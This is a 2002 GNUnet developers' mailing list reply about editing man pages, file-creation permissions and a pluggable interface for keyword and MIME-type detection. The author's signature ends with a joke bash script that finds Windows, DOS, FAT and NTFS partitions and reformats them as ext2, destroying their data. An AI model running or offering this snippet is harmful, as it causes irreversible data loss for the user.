[GNUnet-developers] Re: Man pages and other changes

From: Christian Grothoff
Subject: [GNUnet-developers] Re: Man pages and other changes
Date: Mon, 25 Mar 2002 11:38:13 -0500

On Monday 25 March 2002 03:59 am, you wrote:
> I added the following man pages:
>     gnunet-download.1
>     gnunet-gtk.1
>     gnunet-insert-mp3.1
>     gnunet-insert.1
>     gnunet-search.1
>     gnunetd.1
>     gnunet.conf.5
> They're pretty basic but I think a good start.

Definitely. I've edited them a bit, mostly:

* It is GNUnet, not gnunet or Gnunet. (except of course in
  application names like gnunetd)
* do not use 'the GNUnet network', that's saying network twice :-)

> If you have a
> chance please take a look at them and update them yourself or let
> me know what needs changes.

I looked over all of them & did some changes. This will of course make RMS
unhappy because GNU prefers info-pages (and even suggest rejecting man-pages
if nobody volunteers to maintain them). Anyway, I personally prefer man over
info. Of course, I would not reject texi-files either :-).

> I also added an input parameter for
> the writeFile function to specify the permissions to be used when
> creating the file. The permissions take the form of "600" or
> whatever. This should be a good way to deal with file creation
> permissions.

Seen it, looks good.

> Also, started looking into detecting the mime type of a file.
> GnomeVFS apparently does this. So, we can hack out our own support
> utilizing a systems existing magic file, or utilize GnomeVFS.
> GnomeVFS seems to have some pretty advanced methods for sniffing
> the file type, but using GnomeVFS with the textui doesn't seem
> appropriate. What do you think?

I think we should try to design an *interface* to which we can plug different
libraries for keyword and mime-type extraction. This way, somebody can code a
backend that talks to GnomeVFS, another that talks to 'file'/magic, another
that just uses mp3-id-tags, etc.
Say we add a list of 'keyword discovery libraries' to gnunet.conf, do ldsym
on 'initLIBRARYNAME' on each of them and then use 'scanFile_LIBRARYNAME'
of the form

int scanFile_LIBRARYNAME(int fileHandle, char ** keywords);
/* returns number of keywords extracted, allocates *keywords */

this way, we can write lots of little libraries that we can dynamically plug
into the system.
We may want to have another method for finding MIME types:

char * getType_LIBRARYNAME(int fileHandle)

The library can return NULL (don't know) or a pointer to a string describing
the MIME-Type.

> I've been having problems getting mail to the gnunet-developers
> list, so if you think this is something that interests everyone
> else feel free to forward it on. Thanks.

Hmm. I got your mail to it [Textui stuff]. What is the problem with it?

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"